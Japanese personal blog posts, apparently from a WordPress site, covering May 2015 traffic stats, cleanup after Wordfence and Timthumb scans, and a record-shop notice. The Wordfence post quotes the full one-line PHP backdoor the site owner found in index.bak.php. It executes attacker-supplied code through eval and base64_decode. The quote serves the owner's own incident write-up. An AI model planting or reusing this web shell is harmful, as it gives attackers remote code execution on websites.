投稿日:

アクセス履歴 – 2015/5/6 – 5/24

集計日 PV 日比 週比 UU
2015/05/24(日) 67 -29 +26 33
2015/05/23(土) 109 -28 +55 41
2015/05/22(金) 97 +12 +83 35
2015/05/21(木) 76 +23 +71 28
2015/05/20(水) 86 +35 +48 31
2015/05/19(火) 156 +52 +13 64
2015/05/18(月) 44 -39 -39 23
2015/05/17(日) 96 +36 +3 48
2015/05/16(土) 137 +21 -33 75
2015/05/15(金) 85 -22 -54 35
2015/05/14(木) 53 -28 -32 27
2015/05/13(水) 51 -15 -4 31
2015/05/12(火) 104 -9 +11 42
2015/05/11(月) 83 +20 +20 36
2015/05/10(日) 60 32
2015/05/09(土) 116 41
2015/05/08(金) 107 36
2015/05/07(木) 81 36
2015/05/06(水) 66 39
2015/05/05(火) 113 28
2015/05/04(月) 63 30
投稿日:

Wordfence スキャン index.bak.php を検出

Wordfence をインストール。スキャンでの不正ファイルを発見。これをFTPで削除。
1日1回定期審査のメール受信をアクティベートする。

This file may contain malicious executable code

Filename: index.bak.php
File type: Not a core, theme or plugin file.
Issue first detected: 33 mins ago.
Severity: Critical
Status New

This file is a PHP executable file and contains an eval() function and base64() decoding function on the same line. This is a common technique used by hackers to hide and execute code. If you know about this file you can choose to ignore it to exclude it from future scans.

index.bak.php が作成され、次の一行が書かれていた。

<?php ($_=$_POST).($_1=’_’).($_4=$$_1).($_4=$_4[$_1]).($_4($$_1)).eval(base64_decode($_4($$_1)));?>

.htaccess には改ざんされた様子はない。偽装ファイルも無いようで、恐らく3つのサイトを入れ替えながら更新している過程で改ざんされたと思われる。

投稿日:

Timthumb をスキャン 5ファイルを検出、3ファイルが脆弱

Timthumb と類似のファイルを検出。5ファイルのうち3ファイルは脆弱でバックドアにされている可能性もある。

  • テーマ『Arras Theme』内ライブラリに Timthumb を発見したので、当テーマを削除。
  • テーマ『Producer』内に Timthumb を発見したので、当テーマを削除。
  • テーマ『NewsPaper』内スクリプトに Timthumb を発見したので、当テーマを削除。
  • テーマ『Berita Free』内ライブラリに Timthumb を発見したので、当テーマを削除。

 

Status Version Filename Full Path
Outdated 2.8.3 timthumb.php /home/〜/wp-content/themes/arras-theme/library/timthumb.php
Vulnerable 1.12 cropper.php /home/〜/wp-content/themes/producer/cropper.php
Outdated 2.8.10 resize.php /home/〜/wp-content/themes/newspaper/scripts/resize.php
Vulnerable 2.8 thumb.php /home/〜/wp-content/themes/berita_free/lib_frame/thumb.php
Vulnerable 0 timthumb-config.php /home/〜/wp-content/themes/berita_free/lib_frame/timthumb-config.php
投稿日:

優秀録音、稀少アナログレコードの『アマデウスクラシックス』からのご案内 http://store.amadeusclassics.com/

リストの30枚は、お薦めの希少アナログ盤です。2011年11月16日現在在庫しています。希望者には提供しています。お問い合わせはコメントでお寄せください。オーダーはアマデウスクラシックスのオーダー専用メールアドレスでのみ受け付けています。「レコードの評価基準と、ご注文の方法について( http://store.amadeusclassics.com/?page_id=122 )」をお読みの上ご注文をお願いいたします。

続きを読む 優秀録音、稀少アナログレコードの『アマデウスクラシックス』からのご案内 http://store.amadeusclassics.com/